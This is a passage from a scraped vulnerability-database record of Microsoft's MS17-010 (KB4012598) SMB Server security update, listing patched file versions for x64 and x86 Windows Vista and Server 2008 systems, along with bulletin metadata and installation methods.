applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,952</td><td>03-Aug-2016</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>248,320</td><td>03-Aug-2016</td><td>17:02</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,440</td><td>03-Aug-2016</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>261,120</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,152</td><td>03-Aug-2016</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>231,936</td><td>03-Aug-2016</td><td>17:10</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>99,840</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>101,376</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>233,984</td><td>11-Feb-2017</td><td>17:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>239,104</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>289,792</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>16:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>263,168</td><td>11-Feb-2017</td><td>17:25</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>229,376</td><td>11-Feb-2017</td><td>17:25</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,848</td><td>11-Feb-2017</td><td>17:37</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,440</td><td>11-Feb-2017</td><td>17:42</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:36</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>144,384</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>137,216</td><td>11-Feb-2017</td><td>17:41</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>229,376</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,952</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>248,320</td><td>11-Feb-2017</td><td>17:37</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,440</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>261,120</td><td>11-Feb-2017</td><td>17:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,152</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>231,936</td><td>11-Feb-2017</td><td>17:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>17:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>99,840</td><td>11-Feb-2017</td><td>17:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>101,376</td><td>11-Feb-2017</td><td>17:33</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>16:23</td><td>x64</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:41</td><td>x64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>14:40</td><td>x64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>147,968</td><td>11-Feb-2017</td><td>15:43</td><td>x64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>448,512</td><td>11-Feb-2017</td><td>15:48</td><td>x64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>448,000</td><td>11-Feb-2017</td><td>15:44</td><td>x64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>176,128</td><td>03-Aug-2016</td><td>14:40</td><td>x64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>178,176</td><td>11-Feb-2017</td><td>15:43</td><td>x64</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:22</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>299,008</td><td>03-Aug-2016</td><td>16:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>274,432</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>258,048</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:05</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>299,008</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>274,432</td><td>11-Feb-2017</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>258,048</td><td>11-Feb-2017</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:17</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:18</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H5\">For all supported x86-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:22</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>299,008</td><td>03-Aug-2016</td><td>16:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>274,432</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>258,048</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:40</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>299,008</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>274,432</td><td>11-Feb-2017</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:06</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>258,048</td><td>11-Feb-2017</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:17</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:18</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>103,936</td><td>03-Aug-2016</td><td>14:20</td><td>x86</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>103,936</td><td>11-Feb-2017</td><td>15:18</td><td>x86</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>304,640</td><td>11-Feb-2017</td><td>15:22</td><td>x86</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>305,152</td><td>11-Feb-2017</td><td>15:19</td><td>x86</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>146,432</td><td>03-Aug-2016</td><td>14:20</td><td>x86</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>147,968</td><td>11-Feb-2017</td><td>15:18</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink></body></html>", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T17:40:16", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://support.microsoft.com/en-us/help/4012598/", "reporter": "Microsoft", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-01-01T22:51:04", "history": [], "viewCount": 84, "enchantments": {"dependencies": {"modified": "2021-01-01T22:51:04", "references": [{"idList": ["QUALYSBLOG:9A21B2F2CDFD107DF5A18012922E8783"], "type": "qualysblog"}, {"idList": ["THN:F36FBF9A87FE232BFF8E64C4A351F026", "THN:13E6F1103F8D3BD340649FC4B4D6578C"], "type": "thn"}, {"idList": 
["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:AC5C3889C80508D25E83621B9FB468E5"], "type": "mmpc"}, {"idList": ["MS:CVE-2017-0278", "MS:CVE-2017-0270", "MS:CVE-2017-0274", "MS:CVE-2017-0268", "MS:CVE-2017-0273", "MS:CVE-2017-0269", "MS:CVE-2017-0276", "MS:CVE-2017-0280", "MS:CVE-2017-0271", "MS:CVE-2017-0275"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-01-01T22:51:04", "rev": 2, "value": 2.4, "vector": "NONE"}}, "objectVersion": "1.5", "kb": "KB4012598", "msrc": "MS17-010", "mscve": "", "msplatform": "", "msfamily": "", "msimpact": "", "msseverity": "", "superseeds": [], "parentseeds": [], "msproducts": ["13230", "14113", "13228", "11721", "14210", "11728", "11740", "11733", "11719", "13236", "13233", "14440", "13234", "11708"], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "333f3bd9-9578-fda0-5919-4b8fa39524c3", "f62ed778-6986-d76e-c007-40a28315ffbf", "928d79ba-72eb-762f-39be-122173e95922", "fd3a2888-0af1-3691-5303-bc85b4302e62", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "2b2eeb95-d89c-6614-0db5-88f09133ede6"], "supportAreaPathNodes": [{"id": "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "name": "Windows Server 2008 Datacenter", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "f62ed778-6986-d76e-c007-40a28315ffbf", "name": "Windows 
Server 2008 Enterprise", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2b2eeb95-d89c-6614-0db5-88f09133ede6", "name": "Windows Server 2008 Foundation", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "name": "Windows Server 2008 for Itanium-Based Systems", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "928d79ba-72eb-762f-39be-122173e95922", "name": "Windows Vista Starter", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "333f3bd9-9578-fda0-5919-4b8fa39524c3", "name": "Windows Server 2008 Standard", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "name": "Windows Server 2008 Web Edition", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}], "primarySupportAreaPath": [{"id": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "name": "Windows Server 2008", "parent": 
"7ff57180-2b05-67aa-2c03-ab46c7848b89", "tree": [], "type": "productname"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "name": "Windows Servers", "tree": [], "type": "productfamily"}]}, "lastseen": "2021-01-01T22:51:04", "differentElements": ["cvelist", "cvss", "description", "href", "modified", "mscve", "msfamily", "msimpact", "msproducts", "msrc", "msseverity", "parentseeds", "primarySupportAreaPath", "published", "superseeds", "supportAreaPathNodes", "supportAreaPaths"], "edition": 3}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "8c9ec52d901b4038fe4f2f5856958438", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "# MS17-010: Description of the security update for Windows SMB Server: March\n14, 2017\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The most\nsevere of the vulnerabilities could allow remote code execution if an attacker\nsends specially crafted messages to a Microsoft Server Message Block 1.0\n(SMBv1) server. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin\nMS17-010](https://technet.microsoft.com/library/security/ms17-010).\n\n## More Information\n\nImportant \n \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](https://technet.microsoft.com/en-us/library/hh825699).\n\n## How to obtain and install the update\n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. 
When you turn on automatic\nupdating, this update will be downloaded and installed automatically. For more\ninformation about how to turn on automatic updating, see [Get security updates\nautomatically](https://www.microsoft.com/en-us/safety/pc-\nsecurity/updates.aspx). \n \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update\nCatalog](http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598)\nwebsite. \n\n## More Information\n\n## [ __How to obtain help and support for this security update](javascript:)\n\nHelp for installing updates: [Windows Update:\nFAQ](http://support.microsoft.com/ph/6527) \n \nSecurity solutions for IT professionals: [TechNet Security Support and\nTroubleshooting](https://technet.microsoft.com/security/bb980617.aspx) \n \nHelp for protecting your Windows-based computer from viruses and malware:\n[Microsoft Secure](http://support.microsoft.com/contactus/cu_sc_virsec_master) \n \nLocal support according to your country: [International\nSupport](https://www.microsoft.com/en-us/locale.aspx) \n\nFile Information\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-07-24T22:05:00", "history": [], "viewCount": 84, "enchantments": {"dependencies": {"modified": "2021-07-24T22:05:00", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", 